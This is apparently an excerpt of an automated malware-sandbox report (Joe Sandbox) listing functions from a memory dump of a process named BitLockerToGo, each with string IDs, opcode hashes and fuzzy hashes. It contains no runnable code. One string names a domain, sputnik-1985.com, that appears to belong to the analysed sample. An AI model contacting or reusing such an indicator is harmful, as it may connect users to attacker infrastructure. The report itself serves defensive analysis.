                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5D1243F618212CBCB188F29D86126BB3F2FF8A752F1A947DC485472A0EB789C51D745
                                                                                                                                                                                                            Function 004274A5 Relevance: 4.1, Strings: 3, Instructions: 362COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "uB$)yB$QyB
                                                                                                                                                                                                            • API String ID: 0-1484077961
                                                                                                                                                                                                            • Opcode ID: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
                                                                                                                                                                                                            • Instruction ID: bebb4fd51b4539f016b18d377b659452e01560476b88e099c37467506dc643be
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D12676A0C351CFD714CF28D85131ABBE2AF86314F0989ADE4959B3A1D738ED41CB86
                                                                                                                                                                                                            Function 00414777 Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: >MA$]k$rIA
                                                                                                                                                                                                            • API String ID: 0-1646247225
                                                                                                                                                                                                            • Opcode ID: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
                                                                                                                                                                                                            • Instruction ID: 7dcd1ab1f66cc66079ed29567c30894e9083a3f88b64816671fdba32d81f215f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 604158B6A4836286D718CF24E8513A7B3E2EFE5314F19443ED88597781F7788C41C39A
                                                                                                                                                                                                            Function 00404BC0 Relevance: 3.3, Strings: 2, Instructions: 822COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0$8
                                                                                                                                                                                                            • API String ID: 0-46163386
                                                                                                                                                                                                            • Opcode ID: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
                                                                                                                                                                                                            • Instruction ID: a24fc17715fdec5a2fa229d4773a009ac4947e42e4396509e056516fea690fd9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fbf971c7b98c1d34c34e8907e7335c9f26517fb32f9339876bd19e7f8c73690
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E7226B16083419FD714CF18C880B6BBBE1EF98314F44892EF9999B391D379D948CB96
                                                                                                                                                                                                            Function 00424974 Relevance: 3.2, Strings: 2, Instructions: 715COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: `ibc$PB
                                                                                                                                                                                                            • API String ID: 0-1987769102
                                                                                                                                                                                                            • Opcode ID: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
                                                                                                                                                                                                            • Instruction ID: d7af6ebc4ec7fa9aafc34c7092b5181dfb32356bb0cb9250f61f6585be71885b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 862237366183258BC324DF39DC412ABB7E2EFD5314F59893EE891D7390E77899018B89
                                                                                                                                                                                                            Function 0043C510 Relevance: 3.2, Strings: 2, Instructions: 701COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: f$xHLG
                                                                                                                                                                                                            • API String ID: 2994545307-1062749201
                                                                                                                                                                                                            • Opcode ID: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
                                                                                                                                                                                                            • Instruction ID: d2651cdac37472708b43d0abb75bf2b64163b131a76c60ca99435b560db9f8b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 092215756483418FD314CF24C8C172BB7E2ABC9314F19A93EE585A7392D679DC418B8A
                                                                                                                                                                                                            Function 00426340 Relevance: 3.2, Strings: 2, Instructions: 688COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: H/'&$ur
                                                                                                                                                                                                            • API String ID: 0-969745386
                                                                                                                                                                                                            • Opcode ID: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
                                                                                                                                                                                                            • Instruction ID: 443a563da7a5e4d6bc490b1340c0ec2082c34ead57a9a2c43d9228df9cd59d8b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99322776B083608BD728CF29D85176BB7E2EBC5314F09857DE8899B391DB749C01C78A
                                                                                                                                                                                                            Function 00414DC0 Relevance: 3.0, Strings: 2, Instructions: 530COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 30$b
                                                                                                                                                                                                            • API String ID: 0-3051719697
                                                                                                                                                                                                            • Opcode ID: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
                                                                                                                                                                                                            • Instruction ID: 9d6171b0f8d729934fe615063e41a7396b25218e269f5ca015a4c9f4117884d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F134B5949340CBD724DF24C851BEBB3B1EFD5354F098A2EE48A4B391E7385841CB8A
                                                                                                                                                                                                            Function 0040C6F0 Relevance: 3.0, Strings: 2, Instructions: 519COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: sputnik-1985.com$~|
                                                                                                                                                                                                            • API String ID: 0-3200742978
                                                                                                                                                                                                            • Opcode ID: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
                                                                                                                                                                                                            • Instruction ID: 07f789514de0362c9278d2f25248cc3fff6a0dc72d81a8c8c11c8a6f1e2f7610
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9902DEB114D3C18AD735CF25D4907EFBBE0EB96304F188A6DC4D96B252C3794906CB9A
                                                                                                                                                                                                            Function 0042847D Relevance: 2.9, Strings: 2, Instructions: 420COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: !-%.$i=+9
                                                                                                                                                                                                            • API String ID: 0-3329930587
                                                                                                                                                                                                            • Opcode ID: b9632606a6a59a02ff2bdc4d5ec42fb68dded893a57c999f7d25d5b30fc5a547
                                                                                                                                                                                                            • Instruction ID: 5b9224ec03390a89ae17c2f1361fc79f648e0f3307ec9c5c46c31c27b4184649
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9632606a6a59a02ff2bdc4d5ec42fb68dded893a57c999f7d25d5b30fc5a547
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0D1D2B4A05214CFCF14CFA8D8D1AAEBBB1FF4A304F4445ADE415AB392EB389941CB55
                                                                                                                                                                                                            Function 00429040 Relevance: 2.9, Strings: 2, Instructions: 376COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #&J:$1?,s
                                                                                                                                                                                                            • API String ID: 0-2217357408
                                                                                                                                                                                                            • Opcode ID: d927e046c9505d7feefa359820591f33e86078b0740a6508781e3960d2e362c5
                                                                                                                                                                                                            • Instruction ID: dd87f522568f88e555f085d5caeae9b1fcb5bc55a8534498744cbd14fa8b2ca1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d927e046c9505d7feefa359820591f33e86078b0740a6508781e3960d2e362c5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CD15975F08154CFDB08CF69E8D1AAE7BB2AF4A304F5845ADE4519B392D7398D01CB28
                                                                                                                                                                                                            Function 00404280 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: )$IEND
                                                                                                                                                                                                            • API String ID: 0-707183367
                                                                                                                                                                                                            • Opcode ID: 64e8922db5e19fd8efc6a50d102b0bd740264c5242e44d91e2a004e5aead60ab
                                                                                                                                                                                                            • Instruction ID: 1c4037f214bd03ac7378b9cacc3dd6070e77dcd69ce248976fcc19ea77d077a6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64e8922db5e19fd8efc6a50d102b0bd740264c5242e44d91e2a004e5aead60ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CD1A0B19083449FD720CF14D84575BBBE4ABD4308F14492EFA99AB3C2D779E908CB96
                                                                                                                                                                                                            Function 00416C90 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 0v9t$qN
                                                                                                                                                                                                            • API String ID: 0-941405136
                                                                                                                                                                                                            • Opcode ID: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
                                                                                                                                                                                                            • Instruction ID: 220aa0fee5a4e2dc26cf1b999887b7bccb6aee529e7354faf9f9a8d1f9f2e198
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 495147766053114BC7248A24C8917EF7693DBC1328F1B4A2DD8E59B3D2DB3DD84693CA
                                                                                                                                                                                                            Function 0043E262 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: @$MVWT
                                                                                                                                                                                                            • API String ID: 0-308850327
                                                                                                                                                                                                            • Opcode ID: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
                                                                                                                                                                                                            • Instruction ID: 65c5c0bd10fcc527816f4646fa5217bc89ccf3aa808f0d29d6591c7bb2e007d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D54113765193418BE704CF26C45036BB7E2EFDA305F59682ED4C2AB394DB7C8906CB4A
                                                                                                                                                                                                            Function 0043E850 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: siOk$siOk
                                                                                                                                                                                                            • API String ID: 0-2545891108
                                                                                                                                                                                                            • Opcode ID: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
                                                                                                                                                                                                            • Instruction ID: 3c122c9db7ae0a256ae9501e17b53326d689da9f2a67ac00692780b2415a66a0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB21052951DAA04BCB36CB3D44D463EBBE65F97110B08897DDCE2C73CAC5249800D765
                                                                                                                                                                                                            Function 0042C1A3 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /:8*$x
                                                                                                                                                                                                            • API String ID: 0-64667063
                                                                                                                                                                                                            • Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                                                                                                                                            • Instruction ID: 1aa5775c3a72f552b4e6bc18da63457a51b737a705f76bfcd9083c664813a2f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9014526A0D2B18AD301CA289980217FFD19B97700F184A99D4E6A7290C928DE05879A
                                                                                                                                                                                                            Function 00423A60 Relevance: 1.7, APIs: 1, Instructions: 240COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
                                                                                                                                                                                                            • Instruction ID: 0c1059f1939fd580b755bdfd37faf5cc9b9fc08dac3a05aab46d246ee4cf4ccd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC816976A083109FE320DF54DC817EBB7E5EBC4308F04453EFA8897291D77899068B96
                                                                                                                                                                                                            Function 00423BE0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fb36033027b08c92b0ba88995fcc40c0fbf284deaf0fb6098ad024fa33f4dc7a
                                                                                                                                                                                                            • Instruction ID: 59fb6676a46cb5b2c496f07d3e0a494b9ac9741146e74fd95afe865ddde67d2c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb36033027b08c92b0ba88995fcc40c0fbf284deaf0fb6098ad024fa33f4dc7a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5513576A08310DFE7108F54EC8176BB7E0FBC4318F04497EFA8997291D7B999068B96
                                                                                                                                                                                                            Function 0042A050 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "
                                                                                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                                                                                            • Opcode ID: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
                                                                                                                                                                                                            • Instruction ID: fc6a7fef22a05f64015de1e3c3639137bf4aa38685eff02bd3fad1d047ddcb30
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86D11672B083259FC714CE24E48076BB7E5AB84314F88896EEC9987382E778DC55C797
                                                                                                                                                                                                            Function 0041CA60 Relevance: 1.7, Strings: 1, Instructions: 414COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: UR
                                                                                                                                                                                                            • API String ID: 0-57707318
                                                                                                                                                                                                            • Opcode ID: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
                                                                                                                                                                                                            • Instruction ID: 8fe4e70974bd7395cce93e3b113d0d48c717d0737e0d11109a7980f2f1e1c3b0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61B133755583018BC720CF28CC926ABB7F1EF91364F18961DE8D59B390E338D945C79A
                                                                                                                                                                                                            Function 00440130 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: `ibc
                                                                                                                                                                                                            • API String ID: 2994545307-3725910391
                                                                                                                                                                                                            • Opcode ID: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
                                                                                                                                                                                                            • Instruction ID: f6e7def48d8e745c044bbeb26ce4e72402efdfd5aebbe0cd908a1d30c76b08d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA9114356183019BE714CF18C89166FB7E2EFD9310F18852DEA858B391EB35DC61CB86
                                                                                                                                                                                                            Function 00405DA0 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                                                                            • Opcode ID: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
                                                                                                                                                                                                            • Instruction ID: 263c9164548149212bab00621b26dadebf9e5cd68813eca0907a9d13e3b8c170
                                                                                                                                                                                                            • Opcode Fuzzy Hash: add5d3d9ba30fe1a90ea683ee1e329ddfa9ecc8f8f9b6a47b6e37303dad974ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9B138712097859FD324CF28C88065BBBE0AFA9704F444E2DE5D997382D235EA18CB97
                                                                                                                                                                                                            Function 0041D260 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                                                                            • Opcode ID: 2664bb8dc537b4f7fd320cbe31f1bc9facf10d8e06094f3d85fc7ef8eeac098a
                                                                                                                                                                                                            • Instruction ID: c6b100cd4e7dff2771264374d25d72747b80feda865de7cda43b8dec31ed639d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2664bb8dc537b4f7fd320cbe31f1bc9facf10d8e06094f3d85fc7ef8eeac098a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28813AB69042614FC7218E28C8513AFBBD1AB95324F19C27DECB99B392D2389C45D7D1
                                                                                                                                                                                                            Function 0041CECA Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: :;8
                                                                                                                                                                                                            • API String ID: 0-370357910
                                                                                                                                                                                                            • Opcode ID: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
                                                                                                                                                                                                            • Instruction ID: 6cb1dbdef0645cb70831a53be780a797aaf24bd5e036ecf1d586697fe6f75162
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1751E0B1A483108BD714DF64C8126ABB7F2EF86318F18896DE4858B391E73AD506C75A
                                                                                                                                                                                                            Function 0041FE7C Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                            • API String ID: 0-2679148245
                                                                                                                                                                                                            • Opcode ID: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
